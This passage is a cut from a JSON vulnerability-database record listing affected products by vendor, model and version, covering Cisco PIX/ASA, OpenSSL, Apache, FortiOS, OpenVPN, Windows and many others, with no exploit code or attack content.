"model": "proactive contact",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "3.0"
},
{
"_id": null,
"model": "systems insight manager",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "6.1"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1.21"
},
{
"_id": null,
"model": "communication manager sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "4.0.3"
},
{
"_id": null,
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "5.0.9"
},
{
"_id": null,
"model": "bigip local traffic manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "15009.2.3"
},
{
"_id": null,
"model": "openoffice",
"scope": "eq",
"trust": 0.3,
"vendor": "openoffice",
"version": "3.1"
},
{
"_id": null,
"model": "linux enterprise desktop sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "10"
},
{
"_id": null,
"model": "gnutls",
"scope": "eq",
"trust": 0.3,
"vendor": "gnu",
"version": "2.2.5"
},
{
"_id": null,
"model": "project openssl c",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.7"
},
{
"_id": null,
"model": "-stable",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "6.2"
},
{
"_id": null,
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "4.3.15"
},
{
"_id": null,
"model": "siparator",
"scope": "eq",
"trust": 0.3,
"vendor": "ingate",
"version": "4.6.1"
},
{
"_id": null,
"model": "windows server for x64-based systems r2",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2008"
},
{
"_id": null,
"model": "security agent",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.0.3"
},
{
"_id": null,
"model": "windows server datacenter edition sp1 beta",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "20031"
},
{
"_id": null,
"model": "big-ip link controller",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.0.1"
},
{
"_id": null,
"model": "communication manager",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.1.2"
},
{
"_id": null,
"model": "asa series adaptive security appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "55007.0"
},
{
"_id": null,
"model": "cns network registrar",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.1.1.2"
},
{
"_id": null,
"model": "openvpn",
"scope": "eq",
"trust": 0.3,
"vendor": "openvpn",
"version": "2.0.9"
},
{
"_id": null,
"model": "unified contact center express",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.x"
},
{
"_id": null,
"model": "transportation manager",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6.0"
},
{
"_id": null,
"model": "security agent for icm",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.5.1.616"
},
{
"_id": null,
"model": "software opera web browser",
"scope": "eq",
"trust": 0.3,
"vendor": "opera",
"version": "9"
},
{
"_id": null,
"model": "opensolaris build snv 57",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "windows xp tablet pc edition sp2",
"scope": null,
"trust": 0.3,
"vendor": "microsoft",
"version": null
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.0(8)1"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.0(8.6)"
},
{
"_id": null,
"model": "project openssl l",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.6"
},
{
"_id": null,
"model": "security agent",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.2"
},
{
"_id": null,
"model": "openvpn",
"scope": "eq",
"trust": 0.3,
"vendor": "openvpn",
"version": "2.0.1"
},
{
"_id": null,
"model": "-releng",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "7.0"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "8.0(3)15"
},
{
"_id": null,
"model": "pfsense",
"scope": "ne",
"trust": 0.3,
"vendor": "bsdperimeter",
"version": "1.2.3"
},
{
"_id": null,
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "5.0.2"
},
{
"_id": null,
"model": "wide area application services",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.0.13"
},
{
"_id": null,
"model": "etherfast befsr11 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.41"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.0(6.33)"
},
{
"_id": null,
"model": "csm",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.2(3)"
},
{
"_id": null,
"model": "software opera web browser",
"scope": "eq",
"trust": 0.3,
"vendor": "opera",
"version": "8.53"
},
{
"_id": null,
"model": "java system directory server patch4",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "5.2"
},
{
"_id": null,
"model": "jboss enterprise web server for rhel as",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "41.0"
},
{
"_id": null,
"model": "windows xp professional sp1",
"scope": null,
"trust": 0.3,
"vendor": "microsoft",
"version": null
},
{
"_id": null,
"model": "aura sip enablement services",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "3.1.1"
},
{
"_id": null,
"model": "windows server for itanium-based systems sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2008"
},
{
"_id": null,
"model": "db2 universal database",
"scope": "ne",
"trust": 0.3,
"vendor": "ibm",
"version": "9.7.2"
},
{
"_id": null,
"model": "firewall",
"scope": "eq",
"trust": 0.3,
"vendor": "ingate",
"version": "4.4.1"
},
{
"_id": null,
"model": "java system web server",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "6.1"
},
{
"_id": null,
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "5.0.6"
},
{
"_id": null,
"model": "project proftpd",
"scope": "eq",
"trust": 0.3,
"vendor": "proftpd",
"version": "1.3"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1.19"
},
{
"_id": null,
"model": "linux lts lpia",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "8.04"
},
{
"_id": null,
"model": "linux i386",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "9.10"
},
{
"_id": null,
"model": "openvpn",
"scope": "eq",
"trust": 0.3,
"vendor": "openvpn",
"version": "2.0.8"
},
{
"_id": null,
"model": "glassfish enterprise server",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "2.1.1"
},
{
"_id": null,
"model": "windows vista ultimate",
"scope": null,
"trust": 0.3,
"vendor": "microsoft",
"version": null
},
{
"_id": null,
"model": "aix",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.3.8"
},
{
"_id": null,
"model": "catalyst",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "76004.1(1)"
},
{
"_id": null,
"model": "apache",
"scope": "ne",
"trust": 0.3,
"vendor": "apache",
"version": "2.2.15"
},
{
"_id": null,
"model": "wireless lan control",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "6.0.196.0"
},
{
"_id": null,
"model": "unified callmanager 5.0",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"_id": null,
"model": "software opera web browser",
"scope": "eq",
"trust": 0.3,
"vendor": "opera",
"version": "10.01"
},
{
"_id": null,
"model": "cns network registrar",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.0.5.3"
},
{
"_id": null,
"model": "unified callmanager 5.0 su1",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"_id": null,
"model": "coat systems director",
"scope": "eq",
"trust": 0.3,
"vendor": "blue",
"version": "4.2.2.4"
},
{
"_id": null,
"model": "bigip local traffic manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "16009.1.1"
},
{
"_id": null,
"model": "csm 4.2",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"_id": null,
"model": "unified callmanager 4.1 sr8",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "8.0(4)23"
},
{
"_id": null,
"model": "aura system manager sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"_id": null,
"model": "coat systems blue coat reporter",
"scope": "eq",
"trust": 0.3,
"vendor": "blue",
"version": "8.3.7.1"
},
{
"_id": null,
"model": "asa series adaptive security appliance",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "55008.1(2.39)"
},
{
"_id": null,
"model": "enterprise virtualization hypervisor",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "5"
},
{
"_id": null,
"model": "cns network registrar",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.1.1.4"
},
{
"_id": null,
"model": "hp-ux b.11.31",
"scope": null,
"trust": 0.3,
"vendor": "hp",
"version": null
},
{
"_id": null,
"model": "etherfast befvp41 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.39.64"
},
{
"_id": null,
"model": "project openssl e",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.6"
},
{
"_id": null,
"model": "enterprise manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "1.8"
},
{
"_id": null,
"model": "bigip global traffic manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.0"
},
{
"_id": null,
"model": "jre 07",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "1.5"
},
{
"_id": null,
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.8"
},
{
"_id": null,
"model": "big-ip",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "4.5.12"
},
{
"_id": null,
"model": "opensolaris build snv 102",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "project openssl",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.6"
},
{
"_id": null,
"model": "unified callmanager sr5b",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.1"
},
{
"_id": null,
"model": "siparator",
"scope": "eq",
"trust": 0.3,
"vendor": "ingate",
"version": "4.2.2"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1.23"
},
{
"_id": null,
"model": "enterprise manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "1.4.1"
},
{
"_id": null,
"model": "big-ip psm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.0.1"
},
{
"_id": null,
"model": "syslog-ng premium edition",
"scope": "eq",
"trust": 0.3,
"vendor": "balabit",
"version": "3.0.7"
},
{
"_id": null,
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.7"
},
{
"_id": null,
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5.5"
},
{
"_id": null,
"model": "hp-ux",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "11.31"
},
{
"_id": null,
"model": "security agent for callmanager",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.5.1.639"
},
{
"_id": null,
"model": "firepass",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "6.0.1"
},
{
"_id": null,
"model": "arubaos rn",
"scope": "eq",
"trust": 0.3,
"vendor": "arubanetworks",
"version": "3.1.0.0"
},
{
"_id": null,
"model": "oracle10g standard edition",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.1.0.4"
},
{
"_id": null,
"model": "windows server enterprise edition",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "20080"
},
{
"_id": null,
"model": "java sdk sr13-fp2",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.4.2"
},
{
"_id": null,
"model": "windows professional sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2000"
},
{
"_id": null,
"model": "linux i386",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "8.10"
},
{
"_id": null,
"model": "project openssl k",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.7"
},
{
"_id": null,
"model": "opensolaris build snv 56",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.2(4)10"
},
{
"_id": null,
"model": "linux x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "slackware",
"version": "13.0"
},
{
"_id": null,
"model": "openoffice",
"scope": "eq",
"trust": 0.3,
"vendor": "openoffice",
"version": "2.2.1"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1.11"
},
{
"_id": null,
"model": "catalyst",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "76003.1(17)"
},
{
"_id": null,
"model": "web server a",
"scope": "eq",
"trust": 0.3,
"vendor": "zeus",
"version": "3.3.5"
},
{
"_id": null,
"model": "aura application enablement services",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "5.2"
},
{
"_id": null,
"model": "apache",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "2.2.6"
},
{
"_id": null,
"model": "openoffice",
"scope": "eq",
"trust": 0.3,
"vendor": "openoffice",
"version": "3.2"
},
{
"_id": null,
"model": "wireless lan control",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.2.193.0"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "8.0(4)22"
},
{
"_id": null,
"model": "linux lts powerpc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "6.06"
},
{
"_id": null,
"model": "project openssl beta3",
"scope": "eq",
"trust": 0.3,
"vendor": "openssl",
"version": "0.9.7"
},
{
"_id": null,
"model": "unified communications manager",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.1"
},
{
"_id": null,
"model": "java se sr5",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.0"
},
{
"_id": null,
"model": "-release",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "6.4"
},
{
"_id": null,
"model": "etherfast befsr81 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "2.44"
},
{
"_id": null,
"model": "netbsd",
"scope": "eq",
"trust": 0.3,
"vendor": "netbsd",
"version": "4.1"
},
{
"_id": null,
"model": "aix",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1.2"
},
{
"_id": null,
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "2.36"
},
{
"_id": null,
"model": "apache",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "2.2.12"
},
{
"_id": null,
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.1"
},
{
"_id": null,
"model": "ironport encryption appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.2.7"
},
{
"_id": null,
"model": "linux sparc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "8.10"
},
{
"_id": null,
"model": "blackberry enterprise server for exchange sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "rim",
"version": "5.0"
},
{
"_id": null,
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "4.3.17"
},
{
"_id": null,
"model": "project proftpd 1.3.2a",
"scope": null,
"trust": 0.3,
"vendor": "proftpd",
"version": null
},
{
"_id": null,
"model": "software opera web browser",
"scope": "eq",
"trust": 0.3,
"vendor": "opera",
"version": "9.20"
},
{
"_id": null,
"model": "wireless lan solution engine",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "2.13"
},
{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.9"
},
{
"_id": null,
"model": "ironport email security appliance x-series",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "7.0.1"
},
{
"_id": null,
"model": "ace gss series global site selector",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "44000"
},
{
"_id": null,
"model": "unified ip phone",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7940"
},
{
"_id": null,
"model": "wireless control system",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.2.62.0"
},
{
"_id": null,
"model": "oracle11g standard edition",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.2.0.1.0"
},
{
"_id": null,
"model": "project proftpd .0rc2",
"scope": "eq",
"trust": 0.3,
"vendor": "proftpd",
"version": "1.3"
},
{
"_id": null,
"model": "rsa data protection manager applicance",
"scope": "eq",
"trust": 0.3,
"vendor": "emc",
"version": "3.2.1"
},
{
"_id": null,
"model": "opensolaris build snv 117",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "unified ip phone",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"_id": null,
"model": "oracle10g standard edition",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.2.0.4"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "8.1(1)4"
},
{
"_id": null,
"model": "coat systems director",
"scope": "ne",
"trust": 0.3,
"vendor": "blue",
"version": "5.5.2.3"
},
{
"_id": null,
"model": "etherfast befsru31 router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "1.40.2"
},
{
"_id": null,
"model": "big-ip local traffic manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.0.1"
},
{
"_id": null,
"model": "catalyst",
"scope": "ne",
"trust": 0.3,
"vendor": "cisco",
"version": "65004.1(1)"
},
{
"_id": null,
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "5.0"
},
{
"_id": null,
"model": "circle",
"scope": "eq",
"trust": 0.3,
"vendor": "voodoo",
"version": "1.1.36"
},
{
"_id": null,
"model": "linux enterprise desktop sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "11"
},
{
"_id": null,
"model": "big-ip webaccelerator",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.0.1"
},
{
"_id": null,
"model": "linux ia-32",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "4.0"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "8.0(4)5"
},
{
"_id": null,
"model": "systems insight manager",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "7.4"
},
{
"_id": null,
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5.8"
},
{
"_id": null,
"model": "web server",
"scope": "eq",
"trust": 0.3,
"vendor": "zeus",
"version": "3.1.7"
},
{
"_id": null,
"model": "systems insight manager",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "4.2"
},
{
"_id": null,
"model": "big-ip",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "4.6.3"
},
{
"_id": null,
"model": "software opera web browser",
"scope": "eq",
"trust": 0.3,
"vendor": "opera",
"version": "9.61"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 0.3,
"vendor": "slackware",
"version": "13.0"
},
{
"_id": null,
"model": "message networking",
"scope": null,
"trust": 0.3,
"vendor": "avaya",
"version": null
},
{
"_id": null,
"model": "current",
"scope": null,
"trust": 0.3,
"vendor": "netbsd",
"version": null
},
{
"_id": null,
"model": "pfsense",
"scope": "eq",
"trust": 0.3,
"vendor": "bsdperimeter",
"version": "1.2"
},
{
"_id": null,
"model": "ucosminexus developer standard",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.7"
},
{
"_id": null,
"model": "spam \u0026 virus blocker b-series",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"_id": null,
"model": "enterprise linux desktop optional",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"_id": null,
"model": "linux enterprise",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "11"
},
{
"_id": null,
"model": "fortios",
"scope": "ne",
"trust": 0.3,
"vendor": "fortinet",
"version": "5.4.6"
},
{
"_id": null,
"model": "linux powerpc",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "4.0"
},
{
"_id": null,
"model": "blackberry enterprise server for novell groupwise",
"scope": "eq",
"trust": 0.3,
"vendor": "rim",
"version": "4.1.7"
},
{
"_id": null,
"model": "enterprise linux hpc node supplementary",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"_id": null,
"model": "enterprise linux desktop supplementary client",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "5"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "8.1(1)1"
},
{
"_id": null,
"model": "linux powerpc",
"scope": "eq",
"trust": 0.3,
"vendor": "ubuntu",
"version": "10.04"
},
{
"_id": null,
"model": "ucosminexus application server enterprise",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8"
},
{
"_id": null,
"model": "etherfast befw11s4 wireless ap cable/dsl router",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "+1.42.7"
},
{
"_id": null,
"model": "ciscoworks wireless lan solution engine",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"_id": null,
"model": "windows server datacenter edition sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2008"
},
{
"_id": null,
"model": "java system directory server patch3",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "5.2"
},
{
"_id": null,
"model": "apache",
"scope": "eq",
"trust": 0.3,
"vendor": "apache",
"version": "2.2.2"
},
{
"_id": null,
"model": "windows server enterprise edition",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2003x64"
},
{
"_id": null,
"model": "opensolaris build snv 13",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "unified communications manager",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "6.1(1)"
},
{
"_id": null,
"model": "siparator",
"scope": "eq",
"trust": 0.3,
"vendor": "ingate",
"version": "4.3.2"
},
{
"_id": null,
"model": "unified callmanager",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "5.0(1)"
},
{
"_id": null,
"model": "coat systems blue coat reporter",
"scope": "eq",
"trust": 0.3,
"vendor": "blue",
"version": "8.3.3.1"
},
{
"_id": null,
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.5"
},
{
"_id": null,
"model": "fortios",
"scope": "eq",
"trust": 0.3,
"vendor": "fortinet",
"version": "5.4.1"
},
{
"_id": null,
"model": "wireless lan control",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.2.176.51"
},
{
"_id": null,
"model": "enterprise linux ws extras",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "3"
},
{
"_id": null,
"model": "sdk 02",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "1.4.2"
},
{
"_id": null,
"model": "opensolaris build snv 47",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "linux ia-32",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"_id": null,
"model": "opensolaris build snv 64",
"scope": null,
"trust": 0.3,
"vendor": "sun",
"version": null
},
{
"_id": null,
"model": "project proftpd .0rc1",
"scope": "eq",
"trust": 0.3,
"vendor": "proftpd",
"version": "1.3"
},
{
"_id": null,
"model": "application velocity system",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "31205.0"
},
{
"_id": null,
"model": "enterprise linux es extras",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "3"
},
{
"_id": null,
"model": "unified communications manager sr3",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.2"
},
{
"_id": null,
"model": "jdk 0 03",
"scope": "eq",
"trust": 0.3,
"vendor": "sun",
"version": "1.5"
},
{
"_id": null,
"model": "linux armel",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "4.0"
},
{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.1"
},
{
"_id": null,
"model": "wireless control system for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "0"
},
{
"_id": null,
"model": "transportation manager",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6.1"
},
{
"_id": null,
"model": "ucosminexus portal framework",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "0"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.0(7)16"
},
{
"_id": null,
"model": "software opera web browser",
"scope": "eq",
"trust": 0.3,
"vendor": "opera",
"version": "9.62"
},
{
"_id": null,
"model": "big-ip",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "4.5.9"
},
{
"_id": null,
"model": "appliance server",
"scope": "eq",
"trust": 0.3,
"vendor": "turbolinux",
"version": "3.0x64"
},
{
"_id": null,
"model": "linux enterprise desktop sp4",
"scope": "eq",
"trust": 0.3,
"vendor": "suse",
"version": "10"
},
{
"_id": null,
"model": "windows vista business 64-bit edition sp2",
"scope": null,
"trust": 0.3,
"vendor": "microsoft",
"version": null
},
{
"_id": null,
"model": "openvms secure web server",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "1.1-1"
},
{
"_id": null,
"model": "freebsd",
"scope": "eq",
"trust": 0.3,
"vendor": "freebsd",
"version": "6.3"
},
{
"_id": null,
"model": "linux powerpc",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"_id": null,
"model": "coat systems proxysg",
"scope": "eq",
"trust": 0.3,
"vendor": "blue",
"version": "0"
},
{
"_id": null,
"model": "linux mandrake x86 64",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "2008.0"
},
{
"_id": null,
"model": "aura conferencing standard",
"scope": "eq",
"trust": 0.3,
"vendor": "avaya",
"version": "6.0"
},
{
"_id": null,
"model": "tivoli storage manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.2.1"
},
{
"_id": null,
"model": "big-ip local traffic manager",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "9.3.5"
},
{
"_id": null,
"model": "windows vista home premium 64-bit edition sp2",
"scope": null,
"trust": 0.3,
"vendor": "microsoft",
"version": null
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "8.0(4.28)"
},
{
"_id": null,
"model": "unified contact center express",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "4.x"
},
{
"_id": null,
"model": "windows xp embedded sp2",
"scope": null,
"trust": 0.3,
"vendor": "microsoft",
"version": null
},
{
"_id": null,
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.2"
},
{
"_id": null,
"model": "coat systems packetshaper",
"scope": "eq",
"trust": 0.3,
"vendor": "blue",
"version": "8.4"
},
{
"_id": null,
"model": "pix/asa",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "7.0.4.3"
},
{
"_id": null,
"model": "windows server datacenter edition itanium sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "2003"
},
{
"_id": null,
"model": "unified callmanager 4.2 sr1",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"_id": null,
"model": "linux arm",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "5.0"
},
{
"_id": null,
"model": "ucosminexus service platform",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8"
},
{
"_id": null,
"model": "windows vista business 64-bit edition sp1",
"scope": null,
"trust": 0.3,
"vendor": "microsoft",
"version": null
},
{
"_id": null,
"model": "unified callmanager 4.3 sr1a",
"scope": null,
"trust": 0.3,
"vendor": "cisco",
"version": null
},
{
"_id": null,
"model": "firefox",
"scope": "eq",
"trust": 0.3,
"vendor": "mozilla",
"version": "3.6"
},
{
"_id": null,
"model": "asa series adaptive security appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "cisco",
"version": "55007.0.4.3"
},
{
"_id": null,
"model": "2.1-beta14",
"scope": null,
"trust": 0.3,
"vendor": "openvpn",
"version": null
},
{
"_id": null,
